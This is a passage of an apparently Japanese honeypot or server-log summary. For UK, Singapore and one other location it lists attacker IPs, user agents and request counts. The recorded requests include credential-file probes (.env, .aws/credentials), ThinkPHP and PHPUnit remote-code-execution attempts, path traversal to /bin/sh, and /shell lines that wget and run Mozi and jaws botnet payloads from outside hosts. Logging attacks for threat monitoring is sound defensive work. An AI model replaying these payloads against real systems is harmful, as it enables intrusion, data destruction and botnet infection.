5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 zgrab/0.x`
1	`Opera/9.0 (Macintosh; PPC Mac OS X; U; en)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
2		`\x16\x03\x01\x01D\x01`
8		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.development`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
22	GET	`/.env`	HTTP/1.1
1	GET	`/.json`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?phpinfo=1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//163[.]179[.]165[.]247:55075/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/spotfire/login.html`	HTTP/1.1
2	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/.env.development`	HTTP/1.1
1	POST	`/.env.old`	HTTP/1.1
1	POST	`/.env.prod`	HTTP/1.1
1	POST	`/.env.production.local`	HTTP/1.1
1	POST	`/.env.save`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
11	45.9.20.101	Russia
1	45.144.112.133	United Kingdom
1	46.249.33.53	Netherlands
1	51.222.194.232	Canada
1	62.122.97.50	Russia
2	101.68.211.3	China
7	104.131.102.18	United States
2	109.237.103.9	Russia
2	109.237.103.118	Russia
1	139.162.145.250	Netherlands
2	157.230.216.203	United States
1	159.89.152.227	United States
1	185.180.143.72	Portugal
3	185.220.101.15	Germany
1	185.220.101.43	Germany
1	185.243.218.27	Norway
1	192.241.222.182	United States
1	198.235.24.14	United States
1	210.89.39.75	India
1	212.154.7.246	Turkey
1	213.186.1.137	Croatia

UserAgent一覧

件数	UserAgent
7	`-`
1	`Googlebot/2.1 (+http[:]//www[.]google[.]com/bot.html)`
2	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)`
1	`Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (X11; Linux ppc64le; rv:75.0) Gecko/20100101 Firefox/75.0`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
1	`Roku/DVP-9.10 (289.10E04111A)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
3	GET	`/.env`	HTTP/1.1
1	GET	`/.git/index`	HTTP/1.1
1	GET	`/.svn/entries`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/KIz89PGViACfvNpQE2eoOD5u`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api.php?key=1&apikey=1`	HTTP/1.1
1	GET	`/bag2`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+209[.]141[.]59[.]94/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//210[.]89[.]39[.]75:35243/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/showLogin.cc`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.57.32.0	United States
1	20.120.179.185	United States
1	42.51.55.220	China
1	43.134.163.17	Singapore
11	45.9.20.101	Russia
2	45.77.239.190	United States
1	45.141.157.242	Bulgaria
1	45.144.112.133	United Kingdom
1	46.249.33.53	Netherlands
9	51.79.29.48	Canada
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	114.134.26.244	India
1	135.125.156.43	France
7	137.184.15.77	United States
1	137.184.113.41	United States
1	137.184.122.128	United States
1	156.215.203.68	Egypt
2	157.230.216.203	United States
1	159.223.180.164	United States
1	162.142.125.7	United States
1	167.94.138.118	United States
1	184.105.139.115	United States
1	185.220.100.252	Germany
8	185.254.196.223	Ukraine
1	192.241.213.8	United States
1	198.235.24.32	United States
1	213.186.1.137	Croatia

UserAgent一覧

件数	UserAgent
11	`-`
1	`Googlebot/2.1 (+http[:]//www[.]google[.]com/bot.html)`
3	`Hello, world`
1	`Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`
1	`VLC/3.0.8 LibVLC/3.0.8`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
3		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api.php?key=1&apikey=1`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/mgmt/shared/authn/login`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+v1[.]kannimanelaji[.]com/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0